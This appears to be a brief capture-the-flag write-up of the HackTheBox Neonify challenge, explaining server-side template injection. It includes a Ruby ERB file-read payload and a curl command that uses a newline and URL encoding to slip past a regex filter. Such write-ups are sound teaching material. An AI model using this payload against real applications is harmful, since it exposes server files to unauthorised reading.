We covered Server Side Template Injection vulnerability and demonstrated a practical scenario using HackTheBox Neonify web challenge. SSTI is a server side exploit in which user input is parsed directly to the template engine without validation. In the example we covered, the code contained a regular expression filter to rule out bad characters so we used a newline character and encoded a payload using URL encoding to reveal the flag contents.. This was part of HackTheBox Neonify.

Get OSCP Certificate Notes

The Complete Penetration Testing with BackBox Course

CHALLENGE DESCRIPTION

It’s time for a shiny new reveal for the first-ever text neonifier. Come test out our brand new website and make any text glow like a lo-fi neon tube!

Video Highlights

  • We used this SSTI payload to read and reveal sensitive files
  • <%= File.open('flag.txt').read %
  • The payload should be URL-Encoded with a newline character.

An example request can be sent with curl using the below command to reveal the flag.

curl -d ‘neon=a
%3C%25%3D%20File.open%28%27flag.txt%27%29.read%20%25%3E’ ip:port

Video Walkthrough

About the Author

Cybersecurity Trainer MS in Cybersecurity Expertise in Healthcare and Finance Industries Penetration tester and compliance auditor

View Articles